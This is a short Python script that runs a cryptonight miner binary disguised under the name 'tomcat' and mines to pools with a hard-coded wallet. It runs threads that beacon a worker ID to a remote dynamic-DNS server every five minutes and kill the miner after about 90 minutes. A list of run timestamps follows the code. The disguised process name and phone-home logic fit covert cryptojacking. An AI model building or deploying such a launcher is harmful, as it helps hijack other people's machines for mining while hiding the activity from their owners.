import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:05.122045
#2018-02-17 16:08:04.247622
#2018-02-17 17:57:07.136810
#2018-02-17 19:45:06.421565
#2018-02-17 21:32:01.795388
#2018-02-17 23:17:05.178456
#2018-02-18 01:04:01.461606
#2018-02-18 02:52:04.386809
#2018-02-18 04:40:05.659197
#2018-02-18 06:32:04.332535
#2018-02-18 08:20:06.362502
#2018-02-18 10:08:06.224394
#2018-02-18 11:56:01.513582
#2018-02-18 13:41:07.348459
#2018-02-18 15:32:06.310674
#2018-02-18 17:20:09.207154
#2018-02-18 19:09:03.691919
#2018-02-18 20:55:08.351921
#2018-02-18 22:42:07.054311
#2018-02-19 00:31:06.199390
#2018-02-19 02:16:04.364052
#2018-02-19 04:03:06.150022
#2018-02-19 05:47:05.804829
#2018-02-19 07:33:06.154941
#2018-02-19 09:23:04.765689
#2018-02-19 11:13:01.316980
#2018-02-19 13:01:04.242840
#2018-02-19 14:47:08.946344
#2018-02-19 16:35:11.817513
#2018-02-19 18:23:06.446256
#2018-02-19 20:10:03.072883
#2018-02-19 22:01:06.553200
#2018-02-19 23:47:07.807577
#2018-02-20 01:34:05.608025
#2018-02-20 03:22:04.525639
#2018-02-20 05:09:04.355563
#2018-02-20 06:52:01.259341
#2018-02-20 08:39:01.640069
#2018-02-20 10:23:01.379920
#2018-02-20 12:08:01.827451
#2018-02-20 13:57:08.549654
#2018-02-20 15:42:06.897924
#2018-02-20 17:27:08.519902
#2018-02-20 19:15:08.774468
#2018-02-20 21:03:04.374965
#2018-02-20 22:48:01.275239
#2018-02-21 00:31:07.502270
#2018-02-21 02:18:02.202182
#2018-02-21 04:05:06.495924
#2018-02-21 05:52:05.458782
#2018-02-21 07:40:08.128899
#2018-02-21 09:25:09.066739
#2018-02-21 11:14:01.813762
#2018-02-21 13:01:02.016572
#2018-02-21 14:48:07.917960
#2018-02-21 16:37:01.247855
#2018-02-21 18:26:01.291138
#2018-02-21 20:11:05.129503
#2018-02-21 21:58:07.329031
#2018-02-21 23:47:01.778249
#2018-02-22 01:36:04.699790
#2018-02-22 03:24:07.174961
#2018-02-22 05:12:07.925717
#2018-02-22 06:55:08.353719
#2018-02-22 08:42:01.912365
#2018-02-22 10:31:02.061134
#2018-02-22 12:16:08.797409
#2018-02-22 14:02:10.526502
#2018-02-22 15:49:07.291720
#2018-02-22 17:38:01.727348
#2018-02-22 19:24:05.062894
#2018-02-22 21:17:05.108886
#2018-02-22 23:02:07.709605
#2018-02-23 00:50:05.484002
#2018-02-23 02:37:02.110520
#2018-02-23 04:25:04.464888
#2018-02-23 06:12:01.316079
#2018-02-23 07:59:03.987919
#2018-02-23 10:15:06.266145
#2018-02-23 12:09:05.534780
#2018-02-23 13:56:10.245600
#2018-02-23 15:48:06.039769
#2018-02-23 17:34:04.922908
#2018-02-23 19:21:05.133906
#2018-02-23 21:06:05.842218
#2018-02-23 22:52:05.214446
#2018-02-24 00:40:01.503139
#2018-02-24 02:29:06.316493
#2018-02-24 04:21:01.875832
#2018-02-24 06:08:07.400982
#2018-02-24 07:56:04.126470
#2018-02-24 09:40:08.066295
#2018-02-24 11:36:04.016140
#2018-02-24 13:26:03.877398
#2018-02-24 15:15:06.283933
#2018-02-24 17:04:05.020479
#2018-02-24 18:56:07.510013
#2018-02-24 20:42:07.769752
#2018-02-24 22:52:07.230527
#2018-02-25 02:12:07.718217
#2018-02-25 06:02:01.768918
#2018-02-25 11:39:06.781564